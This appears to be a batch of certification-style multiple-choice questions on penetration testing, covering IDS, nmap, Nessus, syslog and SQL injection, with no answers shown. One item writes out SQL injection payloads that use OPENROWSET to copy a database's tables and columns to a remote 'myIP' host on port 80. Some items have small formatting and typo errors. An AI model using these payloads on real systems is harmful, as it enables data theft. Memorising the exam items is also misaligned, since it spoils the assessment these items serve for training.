What is a difference between host-based intrusion detection systems (HIDS) and network-based intrusion detection systems (NIDS)?

A. NIDS are usually a more expensive solution to implement compared to HIDS.

B. Attempts to install Trojans or backdoors cannot be monitored by a HIDS whereas NIDS can monitor and stop such intrusion events.

C. NIDS are standalone hardware appliances that include network intrusion detection capabilities whereas HIDS consist of software agents installed on individual computers within the system.

D. HIDS requires less administration and training compared to NIDS.

Identify the correct formula for Return on Investment (ROI).

A. ROI = ((Expected Returns Cost of Investment) / Cost of Investment) * 100

B. ROI = (Expected Returns + Cost of Investment) / Cost of Investment

C. ROI = (Expected Returns - Cost of Investment) / Cost of Investment

D. ROI = ((Expected Returns + Cost of Investment) / Cost of Investment) * 100

Which of the following pen testing reports provides detailed information about all the tasks performed during penetration testing?

A. Client-Side Test Report

B. Activity Report

C. Host Report

D. Vulnerability Report

Which of the following scan option is able to identify the SSL services?

A. sS

B. sV C. sU

D. sT

SQL injection attack consists of insertion or "injection" of either a partial or complete SQL query via the

data input or transmitted from the client (browser) to the web application.

A successful SQL injection attack can:

i)Read sensitive data from the database

iii)Modify database data (insert/update/delete)

iii)Execute administration operations on the database (such as shutdown the DBMS)

iV)Recover the content of a given file existing on the DBMS file system or write files into the file system

v)Issue commands to the operating system

Pen tester needs to perform various tests to detect SQL injection vulnerability. He has to make a list of all input fields whose values could be used in crafting a SQL query, including the hidden fields of POST requests and then test them separately, trying to interfere with the query and to generate an error.

In which of the following tests is the source code of the application tested in a non-runtime environment to detect the SQL injection vulnerabilities?

A. Automated Testing

B. Function Testing

C. Dynamic Testing

D. Static Testing

A penetration tester tries to transfer the database from the target machine to a different machine. For this,

he uses OPENROWSET to link the target database to his own database, replicates the database

structure, and transfers the data to his machine by via a connection to the remote machine on port 80.

The query he used to transfer databases was:

'; insert into OPENROWSET

('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from

mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases The query he used to

transfer table 1 was:

'; insert into OPENROWSET('SQLoledb',

'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..table1')

select * from database..table1

What query does he need in order to transfer the column?

A. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.systables

B. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.sysrows

C. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.syscolumns

D. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_tables.dbo.syscolumns

Assessing a network from a hacker's point of view to discover the exploits and vulnerabilities that are accessible to the outside world is which sort of vulnerability assessment?

A. Network Assessments

B. Application Assessments

C. Wireless Network Assessments

D. External Assessment

Nessus can test a server or a network for DoS vulnerabilities. Which one of the following script tries to kill a service?

A. ACT_DENIAL

B. ACT_FLOOD

C. ACT_KILL_HOST

D. ACT_ATTACK

Which one of the following is a supporting tool for 802.11 (wireless) packet injections, it spoofs 802.11 packets to verify whether the access point is valid or not?

A. Airsnort

B. Aircrack

C. Airpwn

D. WEPCrack

Logs are the record of the system and network activities. Syslog protocol is used for delivering log information across an IP network. Syslog messages can be sent via which one of the following?

A. UDP and TCP

B. TCP and SMTP

C. SMTP

D. UDP and SMTP